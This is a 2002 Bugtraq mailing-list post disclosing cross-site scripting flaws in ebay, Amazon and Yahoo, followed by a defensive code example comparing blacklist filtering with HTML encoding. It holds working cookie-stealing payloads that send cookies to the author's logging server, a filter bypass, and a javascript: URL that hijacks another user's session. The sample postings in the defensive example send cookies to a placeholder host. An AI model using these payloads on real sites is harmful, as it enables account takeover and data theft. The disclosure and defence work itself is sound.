Re: Cross-Site Vulnerabilities (Still) Found in Major Web Sites
From: Andrew Wason (aw@rootbin.com)
Date: 01/22/02
- Previous message: KF: "Re: USPS Online Bill Pay - Cleartext Password Leakage"
- Maybe in reply to: Watung Arif: "Cross-Site Vulnerabilities (Still) Found in Major Web Sites"
Date: 22 Jan 2002 14:10:58 -0000
From: Andrew Wason <aw@rootbin.com>
To: bugtraq@securityfocus.com
In-Reply-To: <EFD4B3AC451FD5118E7400E018C326948275F2@AIRWOLF>
> Yahoo, MSN, AOL, Lycos, and Excite suffer from such attack.
So do ebay and Amazon. Yahoo will let you post
pretty much any script/html (in invites, auctions etc.).
ebay tries to strip references to document.cookie in
auction postings, but putting whitespace in there fools
it and allows it to be posted, e.g.:
document
.
cookie
Amazon only allows what they call "basic HTML" in
their auction postings, but you can still get script past
their filter e.g.:
<b onMouseOver="new Image().src='http://demo.rootbin.com:8080/~aw/logger.gif?cookie=' + escape(document.cookie)">test</b>
When the user mouses over the word test, their
cookies will be logged in my webserver's log file.
If a site allows <script> blocks to be posted, you can
log the visitors' cookies with no interaction:
<script language="JavaScript">
new Image().src = "http://demo.rootbin.com:8080/~aw/logger.gif?cookie=" + escape(document.cookie);
</script>
Yahoo is interesting because they allow script to be
posted in their "Yahoo Invites".
http://invites.yahoo.com/
So you can craft an invitation that logs the user's
cookies and have Yahoo email it to the specific
Yahoo users whose accounts you want to access.
I established accounts with each of these (ebay,
Yahoo and Amazon) and was able to collect cookies
on myself and log into that user's account by
manually setting those cookies in my browser. Once
you have the cookies (e.g. for amazon), visit
amazon.com and enter this in your browser URL field
(all one line):
javascript:void(document.cookie="session-id-time=del;expires=Fri, 31 Dec 1999 23:59:59 GMT;domain=amazon.com;");void(document.cookie="session-id=del;expires=Fri, 31 Dec 1999 23:59:59 GMT;domain=amazon.com;");void(document.cookie="ubid-main=del;expires=Fri, 31 Dec 1999 23:59:59 GMT;domain=amazon.com;");void(document.cookie="x-main=del;expires=Fri, 31 Dec 1999 23:59:59 GMT;domain=amazon.com;");void(document.cookie="ubid-main=002-7079596-1079533;domain=amazon.com;");void(document.cookie="x-main=OCoNWc8jtjGE0wvoNWc8jtjGEU0c?OkW;domain=amazon.com;")
This first deletes your current session cookies and
then replaces them with another user's account
information, logging you in (the account info above is
bogus).
On Yahoo, users can choose how long their
accounts stay logged in before asking for a password
again. So if you enter the Yahoo cookies during the
time the user is logged in (within this window) you
have full access to their email, calendar and a lot
more.
I notified Amazon, Yahoo and ebay a while ago - I had
trouble finding out how to notify them. I ended up
using feedback forms on their sites, and a feedback
email alias at amazon.
Amazon responded saying they use SSL so there's
no problem (?). Yahoo responded with a form letter
directing me to various FAQs, I replied and got no
response. ebay did not respond.
Andrew
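A worked illustration of the filtering point in the post above, added here and not part of Andrew's message or of any of the sites' code: the "strip the literal string document.cookie" approach he describes for ebay, side by side with output encoding, run over two constructed sample postings (the logger hostname is a placeholder).

```javascript
// Added example, not from the original post: why deleting the literal token
// "document.cookie" (the ebay filter described above) is not a defence, and
// what a defender should do instead (encode untrusted text for HTML output).
// All inputs are constructed; logger.example is a placeholder hostname.

// Naive blacklist: remove the literal token and hope nothing else is harmful.
function naiveStripCookieRefs(html) {
  return html.split("document.cookie").join("");
}

// Output encoding: every character with meaning to the HTML parser becomes an
// entity, so user-supplied text can never turn into a tag or a script block.
function escapeHtml(text) {
  const entities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (c) => entities[c]);
}

// Detection helper: does the text still contain something the browser would
// parse as a tag? (After proper encoding no "<" survives, so this is false.)
function containsTag(s) {
  return /<\s*[a-z!\/]/i.test(s);
}

// Constructed postings. The second uses the whitespace trick from the post:
// JavaScript treats the line breaks as whitespace, so it still reads cookies.
const POSTING_PLAIN =
  '<script>new Image().src="http://logger.example/?c="+document.cookie</script>';
const POSTING_SPLIT =
  '<script>new Image().src="http://logger.example/?c="+document\n.\ncookie</script>';

// Returns what each approach leaves for the browser, so the difference is testable.
function compareFilters(posting) {
  const naive = naiveStripCookieRefs(posting);
  const encoded = escapeHtml(posting);
  return {
    naiveOutput: naive,
    naiveStillScript: containsTag(naive),          // blacklist leaves <script> intact
    naiveKeepsCookieRead: /document\s*\.\s*cookie/.test(naive),
    encodedOutput: encoded,
    encodedStillScript: containsTag(encoded),      // false: markup is neutralised
  };
}

console.log(compareFilters(POSTING_PLAIN));
console.log(compareFilters(POSTING_SPLIT));
```

Note that even the posting the blacklist "catches" still reaches the page with a live script tag; only encoding removes the injection itself rather than one particular use of it.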